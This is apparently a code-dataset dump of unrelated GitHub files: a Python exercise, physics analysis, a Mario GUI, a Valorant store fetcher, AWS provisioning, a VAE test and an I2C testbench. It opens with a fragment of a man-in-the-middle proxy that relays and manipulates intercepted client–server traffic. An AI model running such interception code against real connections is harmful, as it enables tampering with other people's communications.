(readable or writable or exceptional):\n self.stop()\n for sck in readable:\n dst_sck = self.client_conn \\\n if sck is self.server_conn \\\n else self.server_conn\n data = recvall(sck)\n if not data:\n self.stop()\n break\n # Manipulating the Data:\n new_data = self.get_manipulated_data(dst_sck, data)\n message_queues[dst_sck].put(new_data)\n for sck in writable:\n if not message_queues[sck].empty():\n next_msg = message_queues[sck].get_nowait()\n prefix = \"[server2client]\"\n if sck is self.server_conn:\n prefix = \"[client2server]\"\n vprint(prefix, next_msg)\n sck.send(next_msg)\n","repo_name":"NoamLoewenstern/EverythingMITMServer","sub_path":"handle_connection.py","file_name":"handle_connection.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17743636721","text":"'''Ejercicio 2.3.3: Escribir un programa que pida al usuario un número entero positivo y muestre por pantalla la cuenta atrás desde ese número hasta cero separados por comas. Deberá solicitar el número hasta introducir uno correcto.'''\n# definicion de la funcion\ndef crear_lista(numero):\n lista=\"\"\n verificacion=int(numero)\n if verificacion > 0:\n for i in range(numero+1):\n lista += str(numero-i)\n if i < numero:\n lista += \", \"\n return lista\n raise ValueError (str(numero)+\": solo se permiten valores numericos mayores a 0. intentalo de nuevo: \")\n\nif __name__==\"__main__\":\n # entrada\n numero = 'error'\n while numero == 'error':\n try:\n numero = int(input(\"introduce un numero que no sea negativo: \"))\n # procesamiento\n lista=crear_lista(numero)\n # salida\n print(lista)\n except ValueError:\n print(str(numero)+\": solo se permiten valores numericos mayores a 0. intentalo de nuevo: \")\n","repo_name":"IES-Rafael-Alberti/2223-u2-excepciones-ricitos2001","sub_path":"src/actividad3.py","file_name":"actividad3.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16631867697","text":"import sys\nfrom waveform_class import *\n\n# print usage\nif len(sys.argv) != 6 and len(sys.argv) != 7:\n print(\"\\nUSAGE: python waveform_analyzer.py time_trend_file_path waveform_file_path waveform_n_points config_file_path output_name n_events\")\n print(\"\\nARGUMENTS:\")\n print(\"time_trend_file_path:\\t\\t path to .csv file with time trend\")\n print(\"waveform_file_path:\\t\\t path to .csv file with waveform\")\n print(\"waveform_n_points:\\t\\t number of points in a waveform (e.g. 6250)\")\n print(\"config_file_path:\\t\\t path to configuration file (e.g. config.txt)\")\n print(\"output_name:\\t\\t\\t name used to generate output files (e.g. SiPM00029)\")\n print(\"n_events (optional):\\t\\t number of events to analyze, or text file with event list (if missing, analyze the whole file)\\n\")\n sys.exit()\nprint(\"\\n---------- WAVEFORM ANALYZER LAUNCHED ----------\\n\")\n\n#creates an object waveform of the waveform class\n#_waveform_ = Waveform(sys.argv[1],sys.argv[2],sys.argv[5] if len(sys.argv)==6 else 6250)\n_waveform_ = Waveform(sys.argv[1],sys.argv[2],(int)(sys.argv[3]))\n\n#creates a dictionary of command options to be passed to the class methods\ndef wf_dict():\n config_file = open(sys.argv[4])\n\n lines = config_file.readlines()\n mydict = {}\n for line in lines:\n if line[0] == \"-\": continue\n var,val = line.split('=')\n mydict[var] = val.strip()\n if mydict[var]==\"True\" or mydict[var]==\"true\" or mydict[var]==1: mydict[var] = True\n elif mydict[var]==\"False\" or mydict[var]==\"false\" or mydict[var]==0: mydict[var] = False\n\n if mydict[var]==\"first_points\": mydict[var] = 0\n if mydict[var]==\"max_range\": mydict[var] = 1\n\n if mydict[var]==\"previous_points\": mydict[var] = 0\n if mydict[var]==\"baseline_gap\": mydict[var] = 1\n\n return mydict\n\n#creates on object dictionary\n_wf_dict_ = wf_dict()\n\n\n# ---- Baseline ----\n# baseline_method = \"first_point\"\n# baseline_n_points = 100\n# ---- Minima ----\n# minimum_search_range=50 OK\n# minimum_back_shift=100\n# minimum_n_points=100\n# minimum_gap=0.03\n\n\n#runs the algorithm\n#n_ev = int(sys.argv[6]) if (len(sys.argv)==7 and int(sys.argv[6])>0) else 1000000\nevent_list = []\nif len(sys.argv) == 7:\n try:\n val = int(sys.argv[6])\n print(\"You gave a numer of events as input, analyzing events from 0 to\", val)\n event_list = [int(i) for i in range(val)]\n except ValueError:\n try:\n val = str(sys.argv[6])\n text_file = open(val, \"r\")\n lines = text_file.read().split('\\n')\n text_file.close()\n event_list = [int(i) for i in lines[:-1]]\n print(\"You gave file with a list of events as input, analyzing\",len(event_list),\"events:\", event_list)\n except:\n print(\"Please give a number of events or a path to file with event list, stopping\")\n sys.exit()\nelse: print(\"No number of events specified, analyzing all events\")\n\n_waveform_.find_all_minima(event_list,_wf_dict_[\"baseline_method\"],(int)(_wf_dict_[\"baseline_n_points\"]),(int)(_wf_dict_[\"minimum_method\"]),(int)(_wf_dict_[\"minimum_search_range\"]),(int)(_wf_dict_[\"minimum_back_shift\"]),(int)(_wf_dict_[\"minimum_n_points\"]),(float)(_wf_dict_[\"minimum_gap\"]),(int)(_wf_dict_[\"minimum_n_close\"]),_wf_dict_[\"show_plot\"],_wf_dict_[\"save_plot\"],sys.argv[5])\n\n_waveform_.save_minimum_table(sys.argv[5])\n","repo_name":"AlexRed806/SiPM","sub_path":"waveform_analyzer.py","file_name":"waveform_analyzer.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27172406737","text":"import pygame.font\nfrom settings import *\n\n\nclass GUI:\n def __init__(self, screen):\n self.screen = screen\n self.screen_rect = self.screen.get_rect()\n\n self.text_color = WHITE\n self.text_background_color = LIGHTBLUE\n self.font = pygame.font.Font(\"resources/fonts/emulogic.ttf\", 20)\n\n self.name = \"MARIO\"\n self.name_image = None\n self.name_rect = None\n\n self.score = 0\n self.score_image = None\n self.score_rect = None\n\n self.coin_counter = 0\n self.coin_counter_image = None\n self.coin_counter_rect = None\n\n self.coin_image = pygame.image.load('resources/Images/coin.gif')\n self.coin_rect = self.coin_image.get_rect()\n\n self.world_text = \"WORLD\"\n self.world_text_image = None\n self.world_text_rect = None\n\n self.world_number = 1\n self.level_number = 1\n self.level_name_image = None\n self.level_name_rect = None\n\n self.timer_name = \"TIMER\"\n self.timer_name_image = None\n self.timer_name_rect = None\n\n self.timer = 400\n self.timer_image = None\n self.timer_rect = None\n\n self.update_name_text()\n self.update_score_text()\n self.update_coin_counter_text()\n self.update_coin_image()\n self.update_world_text()\n self.update_level_name_text()\n self.update_timer_name_text()\n self.update_timer_text()\n\n def update_name_text(self):\n self.name_image = self.font.render(self.name, True, self.text_color, self.text_background_color)\n self.name_rect = self.name_image.get_rect()\n self.name_rect.left = self.name_rect.left + 35\n self.name_rect.top = 20\n\n def update_score_text(self):\n score_str = \"{:,}\".format(self.score).zfill(6)\n self.score_image = self.font.render(score_str, True, self.text_color, self.text_background_color)\n self.score_rect = self.score_image.get_rect()\n self.score_rect.left = self.name_rect.left\n self.score_rect.top = 50\n\n def update_coin_counter_text(self):\n coin_counter_str = \"{:,}\".format(self.coin_counter).zfill(2)\n self.coin_counter_image = self.font.render(coin_counter_str, True, self.text_color, self.text_background_color)\n self.coin_counter_rect = self.coin_counter_image.get_rect()\n self.coin_counter_rect.left = self.screen_rect.right * 0.36\n self.coin_counter_rect.top = 50\n\n def update_coin_image(self):\n self.coin_rect.right = self.coin_counter_rect.left - 10\n self.coin_rect.top = 50\n\n def update_world_text(self):\n self.world_text_image = self.font.render(self.world_text, True, self.text_color, self.text_background_color)\n self.world_text_rect = self.world_text_image.get_rect()\n self.world_text_rect.left = self.screen_rect.right * 0.58\n self.world_text_rect.top = 20\n\n def update_level_name_text(self):\n level_name_str = str(self.world_number) + \"-\" + str(self.level_number)\n self.level_name_image = self.font.render(level_name_str, True, self.text_color, self.text_background_color)\n self.level_name_rect = self.level_name_image.get_rect()\n self.level_name_rect.centerx = self.world_text_rect.centerx\n self.level_name_rect.top = 50\n\n def update_timer_name_text(self):\n self.timer_name_image = self.font.render(self.timer_name, True, self.text_color, self.text_background_color)\n self.timer_name_rect = self.timer_name_image.get_rect()\n self.timer_name_rect.right = self.screen_rect.right - 35\n self.timer_name_rect.top = 20\n\n def update_timer_text(self):\n timer_str = \"{:,}\".format(self.timer).zfill(3)\n self.timer_image = self.font.render(timer_str, True, self.text_color, self.text_background_color)\n self.timer_rect = self.timer_image.get_rect()\n self.timer_rect.right = self.timer_name_rect.right\n self.timer_rect.top = 50\n\n def show_score(self):\n self.screen.blit(self.name_image, self.name_rect)\n self.screen.blit(self.score_image, self.score_rect)\n self.screen.blit(self.coin_counter_image, self.coin_counter_rect)\n self.screen.blit(self.coin_image, self.coin_rect)\n self.screen.blit(self.world_text_image, self.world_text_rect)\n self.screen.blit(self.level_name_image, self.level_name_rect)\n self.screen.blit(self.timer_name_image, self.timer_name_rect)\n self.screen.blit(self.timer_image, self.timer_rect)\n","repo_name":"mtizhoush/supermario","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16761259564","text":"from functools import lru_cache\nmatrix =[\n [0,1,1,1],\n [1,1,1,1],\n [0,1,1,1]\n]\nm=len(matrix)\nn=len(matrix[0])\n\ndef dp(i,j):\n if i>=m or j>=n:\n return 0\n if matrix[i][j]==0:\n return 0\n else:\n return min(dp(i+1,j),dp(i,j+1),dp(i+1,j+1))+1\n\n#list1=[dp(i,j) for i in range(m) for j in range(n)]\nprint(dp(0,1))","repo_name":"jagdishwar/CP","sub_path":"Atcoder_DP/Count Square Submatrices with All Ones.py","file_name":"Count Square Submatrices with All Ones.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70750636005","text":"from riot_auth import RiotAuth\nimport asyncio\nimport riot_auth\nimport requests\nimport json\nimport urllib\n\nUSERINFO_URL = f'https://auth.riotgames.com/userinfo'\n\n# set riot client version\ndef set_riot_client_version():\n with urllib.request.urlopen(\"https://valorant-api.com/v1/version\") as url:\n riot_client_build = json.load(url)['data']['riotClientBuild']\n RiotAuth.RIOT_CLIENT_USER_AGENT = f'{riot_client_build} %s (Windows;10;;Professional, x64)'\n\n# translate item uuid to name and icons\ndef get_weapon_info(uuid):\n with open('./db/weapons_kr.json', encoding='utf-8') as f:\n weapons = json.load(f)\n result = None\n for weapon in weapons:\n for single_skin in weapon['skins']:\n # max level video\n video_url = single_skin['levels'][-1]['streamedVideo']\n item = single_skin['levels'][0]\n if item['uuid'] == uuid:\n result = item\n result['streamedVideo'] = video_url\n del result['levelItem']\n del result['assetPath']\n return result\n\nclass UserInfo(riot_auth.RiotAuth):\n def __init__(self, **kwargs):\n super().__init__()\n self.entries = ['access_token', 'scope', 'id_token', 'token_type', 'expires_at', 'user_id', 'entitlements_token']\n @property\n def nickname(self):\n header = {\n 'Authorization': f'Bearer {self.access_token}'\n }\n res_userinfo = requests.get(USERINFO_URL, headers=header)\n profile = res_userinfo.json()\n nickname = profile['acct']['game_name'] + '#' + profile['acct']['tag_line']\n return nickname\n \n def export_data(self):\n data = dict()\n data['_cookies'] = self._cookie_jar._cookies\n for entry in self.entries:\n data[entry] = getattr(self,entry)\n return data\n \n def import_data(self, data:dict):\n self._cookie_jar._cookies = data['_cookies']\n for entry in self.entries:\n setattr(self, entry, data[entry])\n return\n \nclass ValStoreFetcher():\n def __init__(self, region='kr'):\n self.region = region\n\n async def fetch_store(self, auths:dict[str, UserInfo]):\n storefronts = dict()\n for user_id, auth in auths.items():\n store_url = f'https://pd.{self.region}.a.pvp.net/store/v2/storefront/{auth.user_id}'\n header = {\n 'X-Riot-Entitlements-JWT': f'{auth.entitlements_token}',\n 'Authorization': f'Bearer {auth.access_token}'\n }\n res_store = requests.get(store_url, headers=header)\n nickname = auth.nickname\n storefronts[nickname] = res_store.json()\n return storefronts\n \nif __name__ == '__main__':\n async def main():\n user_info_dict = dict()\n vf = ValStoreFetcher()\n cred = ('u', 'p')\n user_info = UserInfo()\n await user_info.authorize(*cred)\n user_info_dict[user_info.user_id] = user_info\n res = await vf.fetch_store(user_info_dict)\n res = res[f'{user_info.nickname}'][\"SkinsPanelLayout\"][\"SingleItemOffers\"]\n for uuid in res:\n print(get_weapon_info(uuid))\n asyncio.run(main())\n\n \n\n \n\n \n \n\n \n","repo_name":"L1nked2/ValorantDiscordBot","sub_path":"src/valstore.py","file_name":"valstore.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26073609074","text":"import tensorflow.experimental.numpy as np\n\nfrom functools import partial\n\n\ndef var(shape=(10, 64, 64, 3), mode=\"uniform\", min=0, max=1, dtype=None):\n if mode == \"normal\" or mode == \"n\":\n return np.random.normal(min, max, shape)\n elif mode == \"zero\" or mode == 0:\n return np.zeros(shape)\n elif mode == \"one\" or mode == 1:\n return np.ones(shape)\n elif mode == \"int\" or isinstance(mode, int):\n return np.random.randint(min, max, shape, dtype=dtype if dtype else \"int32\")\n return np.random.uniform(min, max, shape)\n\n\ndef image(shape=(10, 224, 224, 3), pre=False, mode=None, min=None, max=None):\n if isinstance(shape, int):\n shape = (10, shape, shape, 1)\n if pre:\n mode = mode or \"int\"\n min = min or 0\n max = max or 256\n else:\n mode = mode or \"uniform\"\n min = min or 0\n max = max or 1\n return var(\n shape=shape,\n mode=mode,\n min=min,\n max=max\n )\n\n\n# init_raw = partial(init_image, mode=\"int\")\nvec = partial(var, shape=(32, 64))\nlabel = partial(var, max=10, mode=\"int\", shape=(32, 64))\n","repo_name":"jakubkwiatkowski/core_tools","sub_path":"core_tools/ops/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14993256981","text":"from pl_bolts.datamodules import CIFAR10DataModule\nfrom pl_bolts.models.autoencoders import VAE\nfrom pytorch_lightning import Trainer\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\nimport random\nfrom torchvision.models import resnet18 \nimport torchvision.transforms as T\nfrom PIL import Image\nfrom custom_VAE import custom_VAE\n\nclass CustomDataset(Dataset):\n def __init__(self, batch_rgb_static_last_obs, batch_rgb_static_first_obs, batch_rgb_static_tensor, actions):\n self.batch_rgb_static_last_obs = batch_rgb_static_last_obs\n self.batch_rgb_static_first_obs = batch_rgb_static_first_obs\n self.batch_rgb_static_tensor = batch_rgb_static_tensor\n self.actions = actions\n \n def __len__(self):\n return self.batch_rgb_static_last_obs.shape[0]\n \n def __getitem__(self, index):\n return self.batch_rgb_static_last_obs[index], self.batch_rgb_static_first_obs[index], self.batch_rgb_static_tensor[index], self.actions[index] \n\n#Loading GTI demonstrations\ndef read_data(path):\n indices = [141,3716] #filtered gti_demos\n indices = list(range(indices[0], indices[1] + 1))\n data = ['rgb_static', 'rgb_gripper']\n\n idx = indices[0]\n i = 0\n len_indices = indices[-1] - indices[0]\n rgb_static = [0] * (len_indices+1)\n rgb_gripper = [0] * (len_indices+1)\n actions = [0] * (len_indices+1)\n for idx in indices:\n t = np.load(f'{path}/episode_{idx:07d}.npz', allow_pickle=True)\n print(f\"episode_{indices[i]:07d}.npz\")\n for d in data:\n if d == 'rgb_static':\n rgb_static[i] = t[d][:,:,::-1] # Converts from BGR to RGB\n elif d == 'rgb_gripper':\n rgb_gripper[i] = t[d][:,:,::-1] # Converts from BGR to RGB\n\n actions[i] = t['actions']\n i+=1\n \n return np.array(rgb_static), np.array(rgb_gripper), np.array(actions)\n\ndef random_sampler(rgb_static, rgb_gripper, actions, batch_size, H):\n \n # H is the sample length\n indices = list(range(len(rgb_static) - H))\n\n random_indices = random.choices(indices, k = len(rgb_static) * 3) # Create a list of random indices with length of rgb_static * 3 = 3576 * 3\n\n batch_rgb_static_tensor = torch.zeros((len(rgb_static) * 3, H, 3, rgb_static.shape[2], rgb_static.shape[3]), dtype=torch.uint8)\n #batch_rgb_gripper_tensor = torch.zeros((batch_size, H, 3, rgb_gripper.shape[2], rgb_gripper.shape[3]), dtype=torch.uint8)\n batch_actions_tensor = torch.zeros((len(rgb_static) * 3, H, actions.shape[1]))\n \n i = 0\n for index in random_indices:\n batch_rgb_static_tensor[i] = rgb_static[index:index + H]\n batch_actions_tensor[i] = torch.from_numpy(actions[index:index + H])\n i+=1\n\n return batch_rgb_static_tensor, batch_actions_tensor \n\ndef resize(rgb_static):\n \"\"\" \n Resizes rgb_static images from (200,200) to (32,32)\n \"\"\"\n batch_rgb_static_tensor_resized = torch.zeros((len(rgb_static), 3, 32, 32), dtype=torch.uint8)\n \n transform = T.Compose([\n T.Resize(size = (32, 32)),\n T.PILToTensor()\n ])\n\n\n for i in range(len(rgb_static)):\n\n img = Image.fromarray(rgb_static[i][:,:,::-1])\n\n batch_rgb_static_tensor_resized[i] = transform(img)\n\n return batch_rgb_static_tensor_resized\n\n\ndef VariationalAutoEncoder(rgb_static, rgb_gripper, actions):\n\n vae = custom_VAE(32, enc_type= \"resnet18\")\n #vae = custom_VAE.load_from_checkpoint('/home/ibrahimm/Documents/dl_lab/calvin/sg_weights/epoch=5563-step=1869503.ckpt') #sg_weights\n vae = custom_VAE.load_from_checkpoint('/home/ibrahimm/Documents/dl_lab/calvin/sg_st_step_actions_weights/epoch=10368-step=394022.ckpt') #sg_st_weights\n\n\n H = 15\n batch_size = 32\n\n batch_rgb_static_tensor, batch_actions_tensor = random_sampler(rgb_static, rgb_gripper, actions, batch_size, H)\n\n batch_rgb_static_first_obs = batch_rgb_static_tensor[:,0].float()\n batch_rgb_static_last_obs = batch_rgb_static_tensor[:,-1].float()\n\n #print(batch_rgb_static_last_obs, batch_rgb_static_first_obs)\n\n dataset = CustomDataset(batch_rgb_static_last_obs, batch_rgb_static_first_obs, batch_rgb_static_tensor, batch_actions_tensor)\n\n train_dataloader = DataLoader(dataset, batch_size = 1, num_workers = 2)\n\n #for step, (sg, st, _ , actions) in enumerate(train_dataloader):\n #print(\"in loop\")\n\n sg, st, _ , actions = next(iter(train_dataloader))\n\n vae.eval()\n #sg_reconstructed = vae(sg) # for sg_weights\n sg_reconstructed, zg = vae(sg, st) # for sg_st_weights\n\n return sg, sg_reconstructed, zg\n\n\nif __name__ == \"__main__\":\n path = './gti_demos/'\n rgb_static, rgb_gripper, actions = read_data(path)\n \n batch_rgb_static_tensor_resized = resize(rgb_static)\n\n\n sg, sg_reconstructed, zg = VariationalAutoEncoder(batch_rgb_static_tensor_resized, rgb_gripper, actions)\n\n fig, axes = plt.subplots(2, 10, figsize=(10, 2))\n axes[0][0].set_ylabel('Real', fontsize=12)\n axes[1][0].set_ylabel('Generated', fontsize=12)\n\n for i in range(10):\n \n ax_real = axes[0][i]\n ax_real.imshow((sg[i].type(torch.uint8)).permute(1,2,0))\n ax_real.get_xaxis().set_visible(False)\n ax_real.get_yaxis().set_visible(False)\n\n ax_gen = axes[1][i]\n ax_gen.imshow((sg_reconstructed[i].type(torch.uint8)).permute(1,2,0))\n ax_gen.get_xaxis().set_visible(False)\n ax_gen.get_yaxis().set_visible(False)\n\n plt.show()","repo_name":"youssefnassar95/dl_lab_project","sub_path":"VAE_reconstruction_test.py","file_name":"VAE_reconstruction_test.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7111465434","text":"import logging, pyperclip\nfrom common.config import Configuration\nfrom common.ec2.vpc import Vpc, Vpcs\nfrom common.ec2.instance import Instance\nfrom common.ec2.subnet import Subnet\nfrom common.ec2.security_group import SecurityGroup\nfrom common.ec2.internet_gateway import InternetGateways\nfrom common.ec2.key_pair import KeyPairs\n\nclass CreateAWSResources():\n def _getVpc() -> Vpc:\n vpc = Vpcs.getVpc(name=f\"{Configuration.project_name} vpc\", cidr_block='10.0.0.0/16')\n vpc.wait_until_exists()\n vpc.wait_until_available()\n vpc.enableDnsSupport = True\n vpc.enableDnsHostnames = True\n return vpc\n\n def _getSubnet(vpc: Vpc) -> Subnet:\n subnet = vpc.getSubnet(\n name = f\"{Configuration.project_name} subnet\", \n cidr_block = \"10.0.1.0/24\", \n availability_zone = Configuration.region_name + \"a\")\n subnet.wait_until_available()\n subnet.map_public_ip_on_launch = True\n return subnet\n\n def _getSecurityGroup(vpc: Vpc) -> SecurityGroup:\n sg = vpc.getSecurityGroup(name=f\"{Configuration.project_name} security group\")\n for port in set(Configuration.args.ports):\n ingress_description = f\"Open port {port}\"\n ingress_name = ingress_description.lower().replace(\" \", \"-\")\n sg.authorizeIngress(\n from_port = port, \n protocol = 'tcp', \n cidr_block = '0.0.0.0/0', \n name = ingress_name, \n description = ingress_description, \n to_port = port\n )\n sg.wait_until_exists()\n return sg\n\n def _getInstance(vpc: Vpc, subnet: Subnet, sg: SecurityGroup) -> Instance:\n keypair = KeyPairs.getKeyPair(name=Configuration.project_name.lower().replace(' ', '-'))\n keypair.wait_until_exists()\n bootstrap_string = None\n if Configuration.args.aws_access_key_id and Configuration.args.aws_secret_access_key and Configuration.args.bootstrap_script:\n with open(Configuration.args.bootstrap_script) as f:\n bootstrap_string = f.read().format(Configuration.args.aws_access_key_id, Configuration.args.aws_secret_access_key)\n\n instance = vpc.runInstance(\n name = f\"{Configuration.project_name} instance\", \n keypair = keypair, \n subnet = subnet, \n sg = sg, \n bootstrap_str = bootstrap_string, \n bootstrap_file = None if bootstrap_string else Configuration.args.bootstrap_script )\n return instance\n \n def _addRoute(vpc: Vpc) -> None:\n igw = InternetGateways.getInternetGateway(name=f\"{Configuration.project_name} igw\")\n igw.attachInternetGateway(vpc)\n rtb = vpc.getRouteTable()\n rtb.addIgwRoute(igw, '0.0.0.0/0')\n \n def run(project_name: str):\n vpc = CreateAWSResources._getVpc()\n subnet = CreateAWSResources._getSubnet(vpc=vpc)\n sg = CreateAWSResources._getSecurityGroup(vpc=vpc) \n instance = CreateAWSResources._getInstance(vpc=vpc, subnet=subnet, sg=sg)\n CreateAWSResources._addRoute(vpc)\n\n instance.wait_for_status_ok()\n\n pyperclip.copy(instance.public_ip_address)\n\n logging.info(f'''\n\n Instance IP Address: {instance.public_ip_address}. \n The IP address has been copied to your clipboard. \n \n ''')","repo_name":"tomdemay/glcloud","sub_path":"create_network_imports/create_aws_resources.py","file_name":"create_aws_resources.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37034748452","text":"import random\nfrom queue import Queue\n\nimport cocotb\nfrom cocotb import fork, log\nfrom cocotb.decorators import coroutine\nfrom cocotb.triggers import RisingEdge, FallingEdge, Event, Timer\n\nfrom cocotblib.Flow import Flow\nfrom cocotblib.Stream import Stream, StreamDriverMaster, Transaction\nfrom cocotblib.misc import assertEquals, randInt, ClockDomainAsyncReset, simulationSpeedPrinter, clockedWaitTrue, Bundle, randBits, randBool\nfrom spinal.I2CTester2.lib.misc import OpenDrainInterconnect, I2cSoftMaster\n\n\ncmdToData = [randBits(8) for x in range(256)]\n\ncrapyConflictCounter = 0\nnormalConflictCounter = 0\nnormalTransactionCounter = 0\n\n@coroutine\ndef clockedFuncWaitTrue(clk,that):\n while True:\n yield RisingEdge(clk)\n if that() == True:\n break\n\n@coroutine\ndef SlaveThread(scl,sda,clk,baudPeriod):\n global crapyConflictCounter\n global normalConflictCounter\n global normalTransactionCounter\n log.debug(\"x\")\n IDLE = 0\n START = 1\n DATA = 2\n state = IDLE\n dataState = 0\n scl.write(True)\n sda.write(True)\n\n sclLast = True\n sdaLast = True\n while True:\n yield RisingEdge(clk)\n sclValue = scl.read()\n sdaValue = sda.read()\n sclRising = sclValue and not sclLast\n sclFalling = not sclValue and sclLast\n sdaRising = sdaValue and not sdaLast\n sdaFalling = not sdaValue and sdaLast\n sclLast = sclValue\n sdaLast = sdaValue\n if state == IDLE:\n if sdaFalling and sclValue:\n state = START\n elif state == START:\n if sclFalling:\n state = DATA\n dataState = 0\n address = 0\n elif state == DATA:\n if sclRising:\n if dataState < 8:\n address |= sdaValue << (7-dataState)\n elif sclFalling:\n dataState += 1\n if dataState >= 8 and dataState < 16:\n if random.random() < 0.2: #Clock stretching\n scl.write(False)\n yield Timer(randInt(baudPeriod/10, baudPeriod*10))\n sda.write((cmdToData[address] >> (15-dataState)) & 1)\n yield Timer(baudPeriod/4);\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n sclLast = False\n else:\n sda.write((cmdToData[address] >> (15 - dataState)) & 1)\n elif(dataState == 6 and random.random() < 0.2):\n scl.write(False)\n if random.random() < 0.2: # Clock stretching\n yield Timer(randInt(baudPeriod / 10, baudPeriod * 10))\n yield Timer(baudPeriod / 2)\n sda.write(False)\n yield Timer(baudPeriod / 2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n\n if random.random() < 0.5:\n #Normal conflict\n normalConflictCounter += 1\n for i in range(4):\n rand = randBool()\n scl.write(False)\n yield Timer(baudPeriod/2)\n sda.write(rand)\n yield Timer(baudPeriod/2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n assert sda.read() == rand\n\n scl.write(False)\n yield Timer(baudPeriod / 2)\n sda.write(False)\n yield Timer(baudPeriod / 2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n sda.write(True)\n else:\n #crapy conflict wihtout STOP\n crapyConflictCounter += 1\n scl.write(False)\n yield Timer(baudPeriod / 2)\n sda.write(True)\n yield Timer(baudPeriod / 2)\n scl.write(True)\n yield clockedFuncWaitTrue(clk, scl.read)\n yield Timer(baudPeriod)\n state = IDLE\n continue\n else:\n if random.random() < 0.2: #Clock stretching\n scl.write(False)\n yield Timer(randInt(baudPeriod/10, baudPeriod*10))\n sda.write(True)\n yield Timer(baudPeriod/4);\n scl.write(True)\n sclLast = False\n else:\n sda.write(True)\n elif sclValue:\n if sdaRising:\n state = 0\n if sdaFalling:\n state = 1\n pass\n\n\n\n\n\nclass MasterThread:\n def __init__(self, cmd, rsp, clk, reset, baudPeriod,softMaster):\n self.cmd = cmd\n self.rsp = rsp\n self.clk = clk\n self.baudPeriod = baudPeriod\n self.softMaster = softMaster\n self.cmdQueue = []\n self.cmdDriver = StreamDriverMaster(cmd,lambda : self.cmdQueue.pop(0) if self.cmdQueue and (random.random() < (1.0/10.0)) else None,clk,reset)\n\n\n\n @coroutine\n def run(self):\n global crapyConflictCounter\n global normalConflictCounter\n global normalTransactionCounter\n yield Timer(self.baudPeriod * 10)\n\n while crapyConflictCounter < 2 or normalConflictCounter < 3 or normalTransactionCounter < 40:\n while True:\n colision = False\n\n cmd = Transaction()\n cmd.mode = 0\n cmd.data = randBool()\n self.cmdQueue.append(cmd)\n\n address = randBits(8) | 2\n for bitId in range(8):\n cmd = Transaction()\n cmd.mode = 1\n cmd.data = (address >> (7 - bitId)) & 1\n self.cmdQueue.append(cmd)\n yield clockedWaitTrue(self.clk,self.rsp.valid)\n\n if self.rsp.payload.data != cmd.data:\n assert bitId == 6\n colision = True\n cmd = Transaction()\n cmd.mode = 3 #DROP\n cmd.data = randBool()\n self.cmdQueue.append(cmd)\n break\n if colision:\n continue\n\n for bitId in range(8):\n cmd = Transaction()\n cmd.mode = 1\n cmd.data = True\n self.cmdQueue.append(cmd)\n yield clockedWaitTrue(self.clk,self.rsp.valid)\n assert self.rsp.payload.data == ((cmdToData[address] >> (7-bitId)) & 1)\n\n if random.random() < 0.75:\n cmd = Transaction()\n cmd.mode = 2\n cmd.data = randBool()\n self.cmdQueue.append(cmd)\n if random.random() < 0.75: #no other master frame\n if random.random() < 0.5: # With inter frame delay\n yield Timer(randInt(0,self.baudPeriod*20))\n else:\n @coroutine\n def anotherFrameEmiter():\n yield self.softMaster.sendStart()\n for i in range(5):\n yield self.softMaster.sendBit(randBool())\n yield self.softMaster.sendStop()\n\n yield Timer(randInt(self.baudPeriod * 4, self.baudPeriod * 10))\n fork(anotherFrameEmiter())\n yield Timer(randInt(self.baudPeriod * 1, self.baudPeriod * 14))\n normalTransactionCounter += 1\n break\n\n\n while self.cmdQueue:\n yield Timer(self.baudPeriod * 10)\n\n\n@cocotb.test()\ndef test1(dut):\n cocotb.fork(ClockDomainAsyncReset(dut.clk, dut.reset,100000))\n cocotb.fork(simulationSpeedPrinter(dut.clk))\n\n baudPeriod = 2500000\n sclInterconnect = OpenDrainInterconnect()\n sclInterconnect.addHardDriver(dut.io_i2c_scl_write)\n sclInterconnect.addHardReader(dut.io_i2c_scl_read)\n\n sdaInterconnect = OpenDrainInterconnect()\n sdaInterconnect.addHardDriver(dut.io_i2c_sda_write)\n sdaInterconnect.addHardReader(dut.io_i2c_sda_read)\n\n dut.io_config_samplingClockDivider <= 3\n dut.io_config_timerClockDivider <= 24\n\n softMaster = I2cSoftMaster(sclInterconnect.newSoftConnection(), sdaInterconnect.newSoftConnection(), baudPeriod,dut.clk)\n slaveThread = fork(SlaveThread(sclInterconnect.newSoftConnection(), sdaInterconnect.newSoftConnection(),dut.clk,baudPeriod))\n masterThread = fork(MasterThread(Stream(dut,\"io_cmd\"),Flow(dut,\"io_rsp\"), dut.clk, dut.reset, baudPeriod,softMaster).run())\n\n yield 